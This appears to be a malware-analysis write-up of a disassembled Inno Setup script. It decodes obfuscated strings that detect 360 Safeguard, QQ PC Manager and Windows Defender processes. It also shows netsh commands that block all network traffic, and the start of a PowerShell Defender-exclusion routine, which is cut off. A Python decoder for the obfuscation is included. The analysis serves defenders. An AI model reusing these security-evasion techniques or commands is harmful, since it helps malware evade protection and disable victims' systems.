pop ; StackCount = 9        pop ; 
StackCount = 8        assign Var1, Var8        pop ; StackCount = 7        pushtype !OPENARRAYOFVARIANT ; StackCount = 8        pushtype !OPENARRAYOFVARIANT ; StackCount = 9        pushtype S32 ; StackCount = 10        assign Var10, S32(2)        pushvar Var9 ; StackCount = 11        call SETARRAYLENGTH        pop ; StackCount = 10        pop ; StackCount = 9        assign Var9[0], String_3("")        assign Var9[1], String_3("root\cimv2")        assign Var8, Var9        pop ; StackCount = 8        pushtype String_3 ; StackCount = 9        assign Var9, String_3("ConnectServer")        pushtype BOOLEAN ; StackCount = 10        assign Var10, BOOLEAN(0)        pushtype IDISPATCH ; StackCount = 11        assign Var11, Var1        pushvar Var2 ; StackCount = 12        call IDISPATCHINVOKE        pop ; StackCount = 11        pop ; StackCount = 10        pop ; StackCount = 9        pop ; StackCount = 8        pop ; StackCount = 7        pushtype Type30 ; StackCount = 8        pushtype Type30 ; StackCount = 9        pushtype S32 ; StackCount = 10        assign Var10, S32(11)        pushvar Var9 ; StackCount = 11        call SETARRAYLENGTH        pop ; StackCount = 10        pop ; StackCount = 9        assign Var9[0], S32(51)        assign Var9[1], S32(54)        assign Var9[2], S32(48)        assign Var9[3], S32(116)        assign Var9[4], S32(114)        assign Var9[5], S32(97)        assign Var9[6], S32(121)        assign Var9[7], S32(46)        assign Var9[8], S32(101)        assign Var9[9], S32(120)        assign Var9[10], S32(101)        assign Var8, Var9        pop ; StackCount = 8        pushvar Var5 ; StackCount = 9        call STRFROMCODE        pop ; StackCount = 8        pop ; StackCount = 7        pushtype Type30 ; StackCount = 8        pushtype Type30 ; StackCount = 9        pushtype S32 ; StackCount = 10        assign Var10, S32(11)        pushvar Var9 ; StackCount = 11        call SETARRAYLENGTH        pop ; StackCount = 10        pop ; StackCount = 9        
assign Var9[0], S32(51)        assign Var9[1], S32(54)        assign Var9[2], S32(48)        assign Var9[3], S32(84)        assign Var9[4], S32(114)        assign Var9[5], S32(97)        assign Var9[6], S32(121)        assign Var9[7], S32(46)        assign Var9[8], S32(101)        assign Var9[9], S32(120)        assign Var9[10], S32(101)        assign Var8, Var9        pop ; StackCount = 8        pushvar Var6 ; StackCount = 9        call STRFROMCODE        pop ; StackCount = 8        pop ; StackCount = 7        pushtype Type30 ; StackCount = 8        pushtype Type30 ; StackCount = 9        pushtype S32 ; StackCount = 10        assign Var10, S32(12)        pushvar Var9 ; StackCount = 11        call SETARRAYLENGTH        pop ; StackCount = 10        pop ; StackCount = 9        assign Var9[0], S32(81)        assign Var9[1], S32(81)        assign Var9[2], S32(80)        assign Var9[3], S32(67)        assign Var9[4], S32(84)        assign Var9[5], S32(114)        assign Var9[6], S32(97)        assign Var9[7], S32(121)        assign Var9[8], S32(46)        assign Var9[9], S32(101)        assign Var9[10], S32(120)        assign Var9[11], S32(101)        assign Var8, Var9        pop ; StackCount = 8        pushvar Var7 ; StackCount = 9        call STRFROMCODE        pop ; StackCount = 8        pop ; StackCount = 7        pushtype WideString ; StackCount = 8        assign Var8, String_3("SELECT * FROM Win32_Process WHERE Name="")        add Var8, Var5        add Var8, String_3("" OR ")        add Var8, String_3("Name="")        add Var8, Var6        add Var8, String_3("" OR ")        add Var8, String_3("Name="")        add Var8, Var7        add Var8, Char(""")        assign Var4, Var8        pop ; StackCount = 7        pushtype !OPENARRAYOFVARIANT ; StackCount = 8        pushtype !OPENARRAYOFVARIANT ; StackCount = 9        pushtype S32 ; StackCount = 10        assign Var10, S32(1)        pushvar Var9 ; StackCount = 11        call SETARRAYLENGTH        pop ; StackCount = 10  
      pop ; StackCount = 9        assign Var9[0], Var4        assign Var8, Var9        pop ; StackCount = 8        pushtype String_3 ; StackCount = 9        assign Var9, String_3("ExecQuery")        pushtype BOOLEAN ; StackCount = 10        assign Var10, BOOLEAN(0)        pushtype IDISPATCH ; StackCount = 11        assign Var11, Var2        pushvar Var3 ; StackCount = 12        call IDISPATCHINVOKE        pop ; StackCount = 11        pop ; StackCount = 10        pop ; StackCount = 9        pop ; StackCount = 8        pop ; StackCount = 7        pushtype Variant ; StackCount = 8        pushtype !OPENARRAYOFVARIANT ; StackCount = 9        pushtype !OPENARRAYOFVARIANT ; StackCount = 10        pushtype S32 ; StackCount = 11        assign Var11, S32(0)        pushvar Var10 ; StackCount = 12        call SETARRAYLENGTH        pop ; StackCount = 11        pop ; StackCount = 10        assign Var9, Var10        pop ; StackCount = 9        pushtype String_3 ; StackCount = 10        assign Var10, String_3("Count")        pushtype BOOLEAN ; StackCount = 11        assign Var11, BOOLEAN(0)        pushtype IDISPATCH ; StackCount = 12        assign Var12, Var3        pushvar Var8 ; StackCount = 13        call IDISPATCHINVOKE        pop ; StackCount = 12        pop ; StackCount = 11        pop ; StackCount = 10        pop ; StackCount = 9        pop ; StackCount = 8        gt RetVal, Var8, S32(0)        pop ; StackCount = 7        endtryloc_8a1:        assign RetVal, BOOLEAN(0)        endcatchloc_8af:        ret
This function contains several ASCII-code arrays used to build the strings with which it checks whether a 360 Safeguard process is running.
The decoded results of all the arrays and their corresponding strings are listed below:

  1. First array (26 bytes)
     ASCII codes: 87, 66, 69, 77, 83, 99, 114, 105, 112, 116, 105, 110, 103, 46, 83, 87, 66, 69, 77, 76, 111, 99, 97, 116, 111, 114
     String: "WBEMScripting.SWBEMLocator"

  2. Second array (11 bytes)
     ASCII codes: 51, 54, 48, 116, 114, 97, 121, 46, 101, 120, 101
     String: "360tray.exe"

  3. Third array (11 bytes)
     ASCII codes: 51, 54, 48, 84, 114, 97, 121, 46, 101, 120, 101
     String: "360Tray.exe"

  4. Fourth array (12 bytes)
     ASCII codes: 81, 81, 80, 67, 84, 114, 97, 121, 46, 101, 120, 101
     String: "QQPCTray.exe"

The function queries the system's processes through WMI to check whether a 360 Safeguard process is running:
  1. Create the WMI object: instantiates WBEMScripting.SWBEMLocator
  2. Connect to the WMI service: connects to the root\cimv2 namespace
  3. Build the query string: asks whether any of the three process names 360tray.exe, 360Tray.exe or QQPCTray.exe exists
  4. Execute the query: queries the Win32_Process table with WQL
  5. Check the result: if the returned process count is greater than 0, returns True (a 360 process is running); otherwise returns False

The final WQL query reads: SELECT * FROM Win32_Process WHERE Name="360tray.exe" OR Name="360Tray.exe" OR Name="QQPCTray.exe"
Next, the "DISABLENETWORKADAPTERS" function:
.function(export) void DISABLENETWORKADAPTERS()        pushtype S32 ; StackCount = 1        pushtype BOOLEAN ; StackCount = 2        pushtype Pointer ; StackCount = 3        setptr Var3, Var1        pushtype U8_4 ; StackCount = 4        assign Var4, U8_4(1)        pushtype S32 ; StackCount = 5        assign Var5, S32(0)        pushtype UnicodeString_2 ; StackCount = 6        assign Var6, String_3("")        pushtype UnicodeString_2 ; StackCount = 7        pushtype Type30 ; StackCount = 8        pushtype Type30 ; StackCount = 9        pushtype S32 ; StackCount = 10        assign Var10, S32(36)        pushvar Var9 ; StackCount = 11        call SETARRAYLENGTH        pop ; StackCount = 10        pop ; StackCount = 9        assign Var9[0], S32(97)        assign Var9[1], S32(100)        assign Var9[2], S32(118)        assign Var9[3], S32(102)        assign Var9[4], S32(105)        assign Var9[5], S32(114)        assign Var9[6], S32(101)        assign Var9[7], S32(119)        assign Var9[8], S32(97)        assign Var9[9], S32(108)        assign Var9[10], S32(108)        assign Var9[11], S32(32)        assign Var9[12], S32(115)        assign Var9[13], S32(101)        assign Var9[14], S32(116)        assign Var9[15], S32(32)        assign Var9[16], S32(97)        assign Var9[17], S32(108)        assign Var9[18], S32(108)        assign Var9[19], S32(112)        assign Var9[20], S32(114)        assign Var9[21], S32(111)        assign Var9[22], S32(102)        assign Var9[23], S32(105)        assign Var9[24], S32(108)        assign Var9[25], S32(101)        assign Var9[26], S32(115)        assign Var9[27], S32(32)        assign Var9[28], S32(115)        assign Var9[29], S32(116)        assign Var9[30], S32(97)        assign Var9[31], S32(116)        assign Var9[32], S32(101)        assign Var9[33], S32(32)        assign Var9[34], S32(111)        assign Var9[35], S32(110)        assign Var8, Var9        pop ; StackCount = 8        pushvar 
Var7 ; StackCount = 9        call STRFROMCODE        pop ; StackCount = 8        pop ; StackCount = 7        pushtype UnicodeString_2 ; StackCount = 8        pushtype Type30 ; StackCount = 9        pushtype Type30 ; StackCount = 10        pushtype S32 ; StackCount = 11        assign Var11, S32(5)        pushvar Var10 ; StackCount = 12        call SETARRAYLENGTH        pop ; StackCount = 11        pop ; StackCount = 10        assign Var10[0], S32(110)        assign Var10[1], S32(101)        assign Var10[2], S32(116)        assign Var10[3], S32(115)        assign Var10[4], S32(104)        assign Var9, Var10        pop ; StackCount = 9        pushvar Var8 ; StackCount = 10        call STRFROMCODE        pop ; StackCount = 9        pop ; StackCount = 8        pushvar Var2 ; StackCount = 9        call EXEC        pop ; StackCount = 8        pop ; StackCount = 7        pop ; StackCount = 6        pop ; StackCount = 5        pop ; StackCount = 4        pop ; StackCount = 3        pop ; StackCount = 2        pop ; StackCount = 1        pushtype BOOLEAN ; StackCount = 2        pushtype Pointer ; StackCount = 3        setptr Var3, Var1        pushtype U8_4 ; StackCount = 4        assign Var4, U8_4(1)        pushtype S32 ; StackCount = 5        assign Var5, S32(0)        pushtype UnicodeString_2 ; StackCount = 6        assign Var6, String_3("")        pushtype UnicodeString_2 ; StackCount = 7        pushtype Type30 ; StackCount = 8        pushtype Type30 ; StackCount = 9        pushtype S32 ; StackCount = 10        assign Var10, S32(69)        pushvar Var9 ; StackCount = 11        call SETARRAYLENGTH        pop ; StackCount = 10        pop ; StackCount = 9        assign Var9[0], S32(97)        assign Var9[1], S32(100)        assign Var9[2], S32(118)        assign Var9[3], S32(102)        assign Var9[4], S32(105)        assign Var9[5], S32(114)        assign Var9[6], S32(101)        assign Var9[7], S32(119)        assign Var9[8], S32(97)        assign Var9[9], S32(108)        
assign Var9[10], S32(108)        assign Var9[11], S32(32)        assign Var9[12], S32(115)        assign Var9[13], S32(101)        assign Var9[14], S32(116)        assign Var9[15], S32(32)        assign Var9[16], S32(97)        assign Var9[17], S32(108)        assign Var9[18], S32(108)        assign Var9[19], S32(112)        assign Var9[20], S32(114)        assign Var9[21], S32(111)        assign Var9[22], S32(102)        assign Var9[23], S32(105)        assign Var9[24], S32(108)        assign Var9[25], S32(101)        assign Var9[26], S32(115)        assign Var9[27], S32(32)        assign Var9[28], S32(102)        assign Var9[29], S32(105)        assign Var9[30], S32(114)        assign Var9[31], S32(101)        assign Var9[32], S32(119)        assign Var9[33], S32(97)        assign Var9[34], S32(108)        assign Var9[35], S32(108)        assign Var9[36], S32(112)        assign Var9[37], S32(111)        assign Var9[38], S32(108)        assign Var9[39], S32(105)        assign Var9[40], S32(99)        assign Var9[41], S32(121)        assign Var9[42], S32(32)        assign Var9[43], S32(98)        assign Var9[44], S32(108)        assign Var9[45], S32(111)        assign Var9[46], S32(99)        assign Var9[47], S32(107)        assign Var9[48], S32(105)        assign Var9[49], S32(110)        assign Var9[50], S32(98)        assign Var9[51], S32(111)        assign Var9[52], S32(117)        assign Var9[53], S32(110)        assign Var9[54], S32(100)        assign Var9[55], S32(44)        assign Var9[56], S32(98)        assign Var9[57], S32(108)        assign Var9[58], S32(111)        assign Var9[59], S32(99)        assign Var9[60], S32(107)        assign Var9[61], S32(111)        assign Var9[62], S32(117)        assign Var9[63], S32(116)        assign Var9[64], S32(98)        assign Var9[65], S32(111)        assign Var9[66], S32(117)        assign Var9[67], S32(110)        assign Var9[68], S32(100)        assign Var8, Var9        pop ; StackCount = 8        pushvar Var7 
; StackCount = 9        call STRFROMCODE        pop ; StackCount = 8        pop ; StackCount = 7        pushtype UnicodeString_2 ; StackCount = 8        pushtype Type30 ; StackCount = 9        pushtype Type30 ; StackCount = 10        pushtype S32 ; StackCount = 11        assign Var11, S32(5)        pushvar Var10 ; StackCount = 12        call SETARRAYLENGTH        pop ; StackCount = 11        pop ; StackCount = 10        assign Var10[0], S32(110)        assign Var10[1], S32(101)        assign Var10[2], S32(116)        assign Var10[3], S32(115)        assign Var10[4], S32(104)        assign Var9, Var10        pop ; StackCount = 9        pushvar Var8 ; StackCount = 10        call STRFROMCODE        pop ; StackCount = 9        pop ; StackCount = 8        pushvar Var2 ; StackCount = 9        call EXEC        pop ; StackCount = 8        pop ; StackCount = 7        pop ; StackCount = 6        pop ; StackCount = 5        pop ; StackCount = 4        pop ; StackCount = 3        pop ; StackCount = 2        pop ; StackCount = 1        ret
This function contains two ASCII-code arrays used to build command strings.
The decoded results of all the arrays and their corresponding strings are listed below:

  1. First array (36 bytes)
     ASCII codes: 97, 100, 118, 102, 105, 114, 101, 119, 97, 108, 108, 32, 115, 101, 116, 32, 97, 108, 108, 112, 114, 111, 102, 105, 108, 101, 115, 32, 115, 116, 97, 116, 101, 32, 111, 110
     String: "advfirewall set allprofiles state on"

  2. Second array (5 bytes)
     ASCII codes: 110, 101, 116, 115, 104
     String: "netsh"

  3. Third array (69 bytes)
     ASCII codes: 97, 100, 118, 102, 105, 114, 101, 119, 97, 108, 108, 32, 115, 101, 116, 32, 97, 108, 108, 112, 114, 111, 102, 105, 108, 101, 115, 32, 102, 105, 114, 101, 119, 97, 108, 108, 112, 111, 108, 105, 99, 121, 32, 98, 108, 111, 99, 107, 105, 110, 98, 111, 117, 110, 100, 44, 98, 108, 111, 99, 107, 111, 117, 116, 98, 111, 117, 110, 100
     String: "advfirewall set allprofiles firewallpolicy blockinbound,blockoutbound"

  4. Fourth array (5 bytes)
     ASCII codes: 110, 101, 116, 115, 104
     String: "netsh"

The function configures the Windows Firewall by running two netsh commands:
  1. Enable all firewall profiles: netsh advfirewall set allprofiles state on
  2. Block all inbound and outbound connections: netsh advfirewall set allprofiles firewallpolicy blockinbound,blockoutbound
Effect: turns the Windows Firewall on and sets its policy to block every inbound and outbound connection.
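All three functions above build their strings the same way: an integer array is filled element by element and then handed to STRFROMCODE. The decoder below, added here and not part of the original analysis or the sample, recovers those strings mechanically from the disassembly text, including the zero-length arrays the setup function passes as empty EXEC arguments, and tags each result for triage. SAMPLE_LISTING is a constructed excerpt in the same run-together format as the listings on this page.

```python
"""Decoder for the STRFROMCODE string obfuscation used by this IFPS script.

Added example for this write-up, not part of the original analysis or the
sample. The script stores every string as an integer array (assign VarN[i],
S32(code)) and converts it with "call STRFROMCODE"; this decoder recovers
those strings, which is what was done by hand for the functions above.
SAMPLE_LISTING is a constructed excerpt in the same format.
"""
import re
from typing import List

# One alternation over the whole listing: an array element, the
# SETARRAYLENGTH call that opens a new array, and the STRFROMCODE call that
# consumes it. Scanning the whole text rather than line by line also copes
# with listings that extraction has run together onto a single line.
TOKEN = re.compile(
    r"assign (Var\d+)\[(\d+)\], S32\((\d+)\)"
    r"|call SETARRAYLENGTH"
    r"|call STRFROMCODE"
)

# Constructed excerpt modelled on the disassembly above: "netsh", an empty
# array (SETARRAYLENGTH 0 followed directly by STRFROMCODE), "\Server.log"
# and "360Tray.exe".
SAMPLE_LISTING = (
    "pushtype S32 ; StackCount = 10    assign Var10, S32(5)    pushvar Var9    "
    "call SETARRAYLENGTH    pop ; StackCount = 10    pop ; StackCount = 9    "
    "assign Var9[0], S32(110)    assign Var9[1], S32(101)    assign Var9[2], S32(116)    "
    "assign Var9[3], S32(115)    assign Var9[4], S32(104)    assign Var8, Var9    "
    "pop ; StackCount = 8    pushvar Var7    call STRFROMCODE    pop ; StackCount = 8    "
    "assign Var12, S32(0)    pushvar Var11    call SETARRAYLENGTH    assign Var10, Var11    "
    "pushvar Var9    call STRFROMCODE    pop ; StackCount = 10    "
    "assign Var12, S32(11)    pushvar Var11    call SETARRAYLENGTH    "
    "assign Var11[0], S32(92)    assign Var11[1], S32(83)    assign Var11[2], S32(101)    "
    "assign Var11[3], S32(114)    assign Var11[4], S32(118)    assign Var11[5], S32(101)    "
    "assign Var11[6], S32(114)    assign Var11[7], S32(46)    assign Var11[8], S32(108)    "
    "assign Var11[9], S32(111)    assign Var11[10], S32(103)    pushvar Var9    call STRFROMCODE    "
    "assign Var10, S32(11)    pushvar Var9    call SETARRAYLENGTH    "
    "assign Var9[0], S32(51)    assign Var9[1], S32(54)    assign Var9[2], S32(48)    "
    "assign Var9[3], S32(84)    assign Var9[4], S32(114)    assign Var9[5], S32(97)    "
    "assign Var9[6], S32(121)    assign Var9[7], S32(46)    assign Var9[8], S32(101)    "
    "assign Var9[9], S32(120)    assign Var9[10], S32(101)    pushvar Var6    call STRFROMCODE"
)


def decode_strfromcode(listing: str) -> List[str]:
    """Return every string the listing builds with STRFROMCODE, in order."""
    strings: List[str] = []
    buf = None  # integer array under construction; None when none is open
    for m in TOKEN.finditer(listing):
        tok = m.group(0)
        if tok == "call SETARRAYLENGTH":
            buf = []  # a new array starts; a zero-length one simply stays empty
        elif tok == "call STRFROMCODE":
            strings.append("".join(chr(c) for c in (buf or [])))
            buf = None
        else:
            idx, code = int(m.group(2)), int(m.group(3))
            if buf is None:
                buf = []
            while len(buf) <= idx:  # elements normally arrive in order; pad so
                buf.append(0)       # an out-of-order index still lands in place
            buf[idx] = code
    return strings


def classify(s: str) -> str:
    """Rough triage tag so the interesting strings stand out in a long dump."""
    if not s:
        return "empty"
    if s.upper().startswith("SELECT "):
        return "wql-query"
    if re.match(r"^[A-Za-z]:\\", s) or s.startswith("\\"):
        return "path-fragment"
    if s.lower().endswith(".exe"):
        return "process-name"
    if " " in s:
        return "command-fragment"
    return "literal"


if __name__ == "__main__":
    for s in decode_strfromcode(SAMPLE_LISTING):
        print(f"{classify(s):17} {s!r}")
```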
For Windows Defender there are also the "ISDEFENDERRUNNING" and "ADDDEFENDEREXCLUSION" functions. First, the "ISDEFENDERRUNNING" function:
.function(export) BOOLEAN ISDEFENDERRUNNING()        pushtype Variant ; StackCount = 1        pushtype Variant ; StackCount = 2        pushtype Variant ; StackCount = 3        pushtype UnicodeString_2 ; StackCount = 4        pushtype UnicodeString_2 ; StackCount = 5        pushtype UnicodeString_2 ; StackCount = 6        pushtype UnicodeString_2 ; StackCount = 7        assign RetVal, BOOLEAN(0)        starteh null, loc_b35, null, loc_b43        pushtype Type30 ; StackCount = 8        pushtype Type30 ; StackCount = 9        pushtype S32 ; StackCount = 10        assign Var10, S32(26)        pushvar Var9 ; StackCount = 11        call SETARRAYLENGTH        pop ; StackCount = 10        pop ; StackCount = 9        assign Var9[0], S32(87)        assign Var9[1], S32(66)        assign Var9[2], S32(69)        assign Var9[3], S32(77)        assign Var9[4], S32(83)        assign Var9[5], S32(99)        assign Var9[6], S32(114)        assign Var9[7], S32(105)        assign Var9[8], S32(112)        assign Var9[9], S32(116)        assign Var9[10], S32(105)        assign Var9[11], S32(110)        assign Var9[12], S32(103)        assign Var9[13], S32(46)        assign Var9[14], S32(83)        assign Var9[15], S32(87)        assign Var9[16], S32(66)        assign Var9[17], S32(69)        assign Var9[18], S32(77)        assign Var9[19], S32(76)        assign Var9[20], S32(111)        assign Var9[21], S32(99)        assign Var9[22], S32(97)        assign Var9[23], S32(116)        assign Var9[24], S32(111)        assign Var9[25], S32(114)        assign Var8, Var9        pop ; StackCount = 8        pushvar Var4 ; StackCount = 9        call STRFROMCODE        pop ; StackCount = 8        pop ; StackCount = 7        pushtype WideString ; StackCount = 8        pushtype UnicodeString_2 ; StackCount = 9        pushtype Type30 ; StackCount = 10        pushtype Type30 ; StackCount = 11    
    pushtype S32 ; StackCount = 12        assign Var12, S32(4)        pushvar Var11 ; StackCount = 13        call SETARRAYLENGTH        pop ; StackCount = 12        pop ; StackCount = 11        assign Var11[0], S32(114)        assign Var11[1], S32(111)        assign Var11[2], S32(111)        assign Var11[3], S32(116)        assign Var10, Var11        pop ; StackCount = 10        pushvar Var9 ; StackCount = 11        call STRFROMCODE        pop ; StackCount = 10        pop ; StackCount = 9        assign Var8, Var9        pop ; StackCount = 8        pushtype UnicodeString_2 ; StackCount = 9        pushtype Type30 ; StackCount = 10        pushtype Type30 ; StackCount = 11        pushtype S32 ; StackCount = 12        assign Var12, S32(1)        pushvar Var11 ; StackCount = 13        call SETARRAYLENGTH        pop ; StackCount = 12        pop ; StackCount = 11        assign Var11[0], S32(92)        assign Var10, Var11        pop ; StackCount = 10        pushvar Var9 ; StackCount = 11        call STRFROMCODE        pop ; StackCount = 10        pop ; StackCount = 9        add Var8, Var9        pop ; StackCount = 8        pushtype UnicodeString_2 ; StackCount = 9        pushtype Type30 ; StackCount = 10        pushtype Type30 ; StackCount = 11        pushtype S32 ; StackCount = 12        assign Var12, S32(5)        pushvar Var11 ; StackCount = 13        call SETARRAYLENGTH        pop ; StackCount = 12        pop ; StackCount = 11        assign Var11[0], S32(99)        assign Var11[1], S32(105)        assign Var11[2], S32(109)        assign Var11[3], S32(118)        assign Var11[4], S32(50)        assign Var10, Var11        pop ; StackCount = 10        pushvar Var9 ; StackCount = 11        call STRFROMCODE        pop ; StackCount = 10        pop ; StackCount = 9        add Var8, Var9        pop ; StackCount = 8        assign Var5, Var8        pop ; StackCount = 7        pushtype Type30 ; StackCount = 8        pushtype Type30 ; StackCount = 9        pushtype S32 ; StackCount 
= 10        assign Var10, S32(11)        pushvar Var9 ; StackCount = 11        call SETARRAYLENGTH        pop ; StackCount = 10        pop ; StackCount = 9        assign Var9[0], S32(77)        assign Var9[1], S32(115)        assign Var9[2], S32(77)        assign Var9[3], S32(112)        assign Var9[4], S32(69)        assign Var9[5], S32(110)        assign Var9[6], S32(103)        assign Var9[7], S32(46)        assign Var9[8], S32(101)        assign Var9[9], S32(120)        assign Var9[10], S32(101)        assign Var8, Var9        pop ; StackCount = 8        pushvar Var6 ; StackCount = 9        call STRFROMCODE        pop ; StackCount = 8        pop ; StackCount = 7        pushtype WideString ; StackCount = 8        pushtype UnicodeString_2 ; StackCount = 9        pushtype Type30 ; StackCount = 10        pushtype Type30 ; StackCount = 11        pushtype S32 ; StackCount = 12        assign Var12, S32(40)        pushvar Var11 ; StackCount = 13        call SETARRAYLENGTH        pop ; StackCount = 12        pop ; StackCount = 11        assign Var11[0], S32(83)        assign Var11[1], S32(69)        assign Var11[2], S32(76)        assign Var11[3], S32(69)        assign Var11[4], S32(67)        assign Var11[5], S32(84)        assign Var11[6], S32(32)        assign Var11[7], S32(42)        assign Var11[8], S32(32)        assign Var11[9], S32(70)        assign Var11[10], S32(82)        assign Var11[11], S32(79)        assign Var11[12], S32(77)        assign Var11[13], S32(32)        assign Var11[14], S32(87)        assign Var11[15], S32(105)        assign Var11[16], S32(110)        assign Var11[17], S32(51)        assign Var11[18], S32(50)        assign Var11[19], S32(95)        assign Var11[20], S32(80)        assign Var11[21], S32(114)        assign Var11[22], S32(111)        assign Var11[23], S32(99)        assign Var11[24], S32(101)        assign Var11[25], S32(115)        assign Var11[26], S32(115)        assign Var11[27], S32(32)        assign Var11[28], S32(87)      
  assign Var11[29], S32(72)        assign Var11[30], S32(69)        assign Var11[31], S32(82)        assign Var11[32], S32(69)        assign Var11[33], S32(32)        assign Var11[34], S32(78)        assign Var11[35], S32(97)        assign Var11[36], S32(109)        assign Var11[37], S32(101)        assign Var11[38], S32(61)        assign Var11[39], S32(34)        assign Var10, Var11        pop ; StackCount = 10        pushvar Var9 ; StackCount = 11        call STRFROMCODE        pop ; StackCount = 10        pop ; StackCount = 9        assign Var8, Var9        pop ; StackCount = 8        add Var8, Var6        pushtype UnicodeString_2 ; StackCount = 9        pushtype Type30 ; StackCount = 10        pushtype Type30 ; StackCount = 11        pushtype S32 ; StackCount = 12        assign Var12, S32(1)        pushvar Var11 ; StackCount = 13        call SETARRAYLENGTH        pop ; StackCount = 12        pop ; StackCount = 11        assign Var11[0], S32(34)        assign Var10, Var11        pop ; StackCount = 10        pushvar Var9 ; StackCount = 11        call STRFROMCODE        pop ; StackCount = 10        pop ; StackCount = 9        add Var8, Var9        pop ; StackCount = 8        assign Var7, Var8        pop ; StackCount = 7        pushtype IDISPATCH ; StackCount = 8        pushtype UnicodeString_2 ; StackCount = 9        assign Var9, Var4        pushvar Var8 ; StackCount = 10        call CREATEOLEOBJECT        pop ; StackCount = 9        pop ; StackCount = 8        assign Var1, Var8        pop ; StackCount = 7        pushtype !OPENARRAYOFVARIANT ; StackCount = 8        pushtype !OPENARRAYOFVARIANT ; StackCount = 9        pushtype S32 ; StackCount = 10        assign Var10, S32(2)        pushvar Var9 ; StackCount = 11        call SETARRAYLENGTH        pop ; StackCount = 10        pop ; StackCount = 9        assign Var9[0], String_3("")        assign Var9[1], Var5        assign Var8, Var9        pop ; StackCount = 8        pushtype String_3 ; StackCount = 9        assign 
Var9, String_3("ConnectServer")        pushtype BOOLEAN ; StackCount = 10        assign Var10, BOOLEAN(0)        pushtype IDISPATCH ; StackCount = 11        assign Var11, Var1        pushvar Var2 ; StackCount = 12        call IDISPATCHINVOKE        pop ; StackCount = 11        pop ; StackCount = 10        pop ; StackCount = 9        pop ; StackCount = 8        pop ; StackCount = 7        pushtype !OPENARRAYOFVARIANT ; StackCount = 8        pushtype !OPENARRAYOFVARIANT ; StackCount = 9        pushtype S32 ; StackCount = 10        assign Var10, S32(1)        pushvar Var9 ; StackCount = 11        call SETARRAYLENGTH        pop ; StackCount = 10        pop ; StackCount = 9        assign Var9[0], Var7        assign Var8, Var9        pop ; StackCount = 8        pushtype String_3 ; StackCount = 9        assign Var9, String_3("ExecQuery")        pushtype BOOLEAN ; StackCount = 10        assign Var10, BOOLEAN(0)        pushtype IDISPATCH ; StackCount = 11        assign Var11, Var2        pushvar Var3 ; StackCount = 12        call IDISPATCHINVOKE        pop ; StackCount = 11        pop ; StackCount = 10        pop ; StackCount = 9        pop ; StackCount = 8        pop ; StackCount = 7        pushtype Variant ; StackCount = 8        pushtype !OPENARRAYOFVARIANT ; StackCount = 9        pushtype !OPENARRAYOFVARIANT ; StackCount = 10        pushtype S32 ; StackCount = 11        assign Var11, S32(0)        pushvar Var10 ; StackCount = 12        call SETARRAYLENGTH        pop ; StackCount = 11        pop ; StackCount = 10        assign Var9, Var10        pop ; StackCount = 9        pushtype String_3 ; StackCount = 10        assign Var10, String_3("Count")        pushtype BOOLEAN ; StackCount = 11        assign Var11, BOOLEAN(0)        pushtype IDISPATCH ; StackCount = 12        assign Var12, Var3        pushvar Var8 ; StackCount = 13        call IDISPATCHINVOKE        pop ; StackCount = 12        pop ; StackCount = 11        pop ; StackCount = 10        pop ; StackCount = 9       
 pop ; StackCount = 8        gt RetVal, Var8, S32(0)        pop ; StackCount = 7        endtryloc_b35:        assign RetVal, BOOLEAN(0)        endcatchloc_b43:        ret
The recovered contents of all the ASCII-code arrays are:

  1. Array 1 (26 bytes) ASCII codes: 87, 66, 69, 77, 83, 99, 114, 105, 112, 116, 105, 110, 103, 46, 83, 87, 66, 69, 77, 76, 111, 99, 97, 116, 111, 114 String: "WBEMScripting.SWBEMLocator"

  2. Array 2 (4 bytes) ASCII codes: 114, 111, 111, 116 String: "root"

  3. Array 3 (1 byte) ASCII code: 92 String: "\"

  4. Array 4 (5 bytes) ASCII codes: 99, 105, 109, 118, 50 String: "cimv2"

  5. Array 5 (11 bytes) ASCII codes: 77, 115, 77, 112, 69, 110, 103, 46, 101, 120, 101 String: "MsMpEng.exe"

  6. Array 6 (40 bytes) ASCII codes: 83, 69, 76, 69, 67, 84, 32, 42, 32, 70, 82, 79, 77, 32, 87, 105, 110, 51, 50, 95, 80, 114, 111, 99, 101, 115, 115, 32, 87, 72, 69, 82, 69, 32, 78, 97, 109, 101, 61, 34 String: "SELECT * FROM Win32_Process WHERE Name=""

  7. Array 7 (1 byte) ASCII code: 34 String: """

This function uses a WMI query to check whether the Windows Defender process (MsMpEng.exe) is running. It builds the WQL query SELECT * FROM Win32_Process WHERE Name="MsMpEng.exe"; if the result count is greater than 0 it returns True, meaning the Windows Defender process is running.
Now look at the "ADDDEFENDEREXCLUSION" function:
.function(export) void ADDDEFENDEREXCLUSION()        pushtype S32 ; StackCount = 1        pushtype UnicodeString_2 ; StackCount = 2        pushtype UnicodeString_2 ; StackCount = 3        pushtype UnicodeString_2 ; StackCount = 4        pushtype BOOLEAN ; StackCount = 5        pushvar Var5 ; StackCount = 6        call ISDEFENDERRUNNING        pop ; StackCount = 5        sfz Var5        pop ; StackCount = 4        jf loc_ead        pushtype Type30 ; StackCount = 5        pushtype Type30 ; StackCount = 6        pushtype S32 ; StackCount = 7        assign Var7, S32(14)        pushvar Var6 ; StackCount = 8        call SETARRAYLENGTH        pop ; StackCount = 7        pop ; StackCount = 6        assign Var6[0], S32(112)        assign Var6[1], S32(111)        assign Var6[2], S32(119)        assign Var6[3], S32(101)        assign Var6[4], S32(114)        assign Var6[5], S32(115)        assign Var6[6], S32(104)        assign Var6[7], S32(101)        assign Var6[8], S32(108)        assign Var6[9], S32(108)        assign Var6[10], S32(46)        assign Var6[11], S32(101)        assign Var6[12], S32(120)        assign Var6[13], S32(101)        assign Var5, Var6        pop ; StackCount = 5        pushvar Var2 ; StackCount = 6        call STRFROMCODE        pop ; StackCount = 5        pop ; StackCount = 4        pushtype Type30 ; StackCount = 5        pushtype Type30 ; StackCount = 6        pushtype S32 ; StackCount = 7        assign Var7, S32(8)        pushvar Var6 ; StackCount = 8        call SETARRAYLENGTH        pop ; StackCount = 7        pop ; StackCount = 6        assign Var6[0], S32(45)        assign Var6[1], S32(67)        assign Var6[2], S32(111)        assign Var6[3], S32(109)        assign Var6[4], S32(109)        assign Var6[5], S32(97)        assign Var6[6], S32(110)        assign Var6[7], S32(100)        assign Var5, Var6        pop ; StackCount = 5        pushvar Var3 ; StackCount = 6        call STRFROMCODE        pop ; 
